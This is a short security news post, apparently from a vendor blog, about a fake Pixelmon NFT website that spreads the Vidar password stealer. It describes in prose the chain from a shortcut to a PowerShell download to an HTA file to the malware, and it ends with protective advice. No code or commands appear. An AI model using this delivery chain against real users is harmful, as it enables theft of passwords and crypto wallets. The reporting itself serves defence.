1 min read

Scam Pixelmon NFT Website Hosts Password-stealing Malware

Vlad CONSTANTINESCU
Ad One product to protect all your devices, without slowing them down.
Free 90-day trial
Scam Pixelmon NFT Website Hosts Password-stealing Malware

A fraudulent website mimicking popular Pixelmon NFT lures its visitors with promises of free collectibles and tokens only to have them download and install password-stealing malware.

Pixelmon is an NFT project that has garnered a significant fanbase, counting almost 200 thousand followers on Twitter and more than 25,000 Discord members. Its popularity stems from the project's promising roadmap, which includes developing an online game in the metaverse where players can collect, train, and use Pixelmon pets to battle other players.

In this recent scam attempt, threat actors have created a copy of the original website and used it to host password-stealing malware that would drain the victims' cryptocurrency wallets. The perpetrators paid great attention to detail and replicated the website almost identically.

However, instead of providing visitors with links to a game's demo version, the faux Pixelmon website hosts malicious executables that deploy password-stealing malware on infected devices. Users would need to download a malicious archive that packs a Windows shortcut to be compromised.

Upon accessing the Windows shortcut (setup.lnk), the potential victims trigger the execution of a PowerShell script that downloads a System32.hta file from the fake Pixelmon website. As BleepingComputer reported, the System32.hta file retrieves a password-stealing malware called Vidar spotted in similar attacks in the past.

Running Vidar establishes a connection to a Telegram channel, retrieves a C2's IP address, then downloads additional configuration files and modules to steal data from compromised systems. Vidar can search for relevant files on infected devices, exfiltrate them to the threat actor's defined address, and steal passwords from apps and browsers.

This malware explicitly targets text files, crypto wallets, authentication and password files, and backups and codes. As Pixelmon is an NFT site, threat actors expect visitors to have cryptocurrency wallets installed on their systems.

To steer clear of this type of attack, users should always pay attention to the website's URL, use only official links, avoid downloading content from unknown or untrusted websites, and use dedicated solutions to scan downloaded files for suspicious content.

tags


Author



Right now

Top posts

How to monitor your online privacy during your Thanksgiving trip

How to monitor your online privacy during your Thanksgiving trip

November 22, 2022

3 min read
Just your yearly dose of Black Friday spam: Cybercrooks get ahead of the game to steal shoppers’ info

Just your yearly dose of Black Friday spam: Cybercrooks get ahead of the game to steal shoppers’ info

November 16, 2022

6 min read
Bitdefender VPN in 2022: the new, the improved, and the soon-to-be

Bitdefender VPN in 2022: the new, the improved, and the soon-to-be

November 14, 2022

5 min read
August Spam Debrief: Bitdefender Labs Warns of Fraud Campaigns Exploiting the Russia-Ukraine War

August Spam Debrief: Bitdefender Labs Warns of Fraud Campaigns Exploiting the Russia-Ukraine War

August 31, 2022

4 min read
Snake Keylogger Returns in Malspam Campaign Disguised as Business Portfolio from IT Vendor

Snake Keylogger Returns in Malspam Campaign Disguised as Business Portfolio from IT Vendor

August 30, 2022

2 min read
What is medical identity theft and how to protect against it

What is medical identity theft and how to protect against it

July 27, 2022

2 min read

FOLLOW US ON

SOCIAL MEDIA


You might also like

Flaw allowed man to access private information of other Brinks Home Security customers Flaw allowed man to access private information of other Brinks Home Security customers
Graham CLULEY

November 30, 2022

2 min read
Enhance your cyber resilience and privacy on Computer Security Day in four easy steps Enhance your cyber resilience and privacy on Computer Security Day in four easy steps
Alina BÎZGĂ

November 29, 2022

2 min read
Hackers Steal Crime Files in Attack on Belgian Police Station, Then Demand Ransom Hackers Steal Crime Files in Attack on Belgian Police Station, Then Demand Ransom
Filip TRUȚĂ

November 28, 2022

2 min read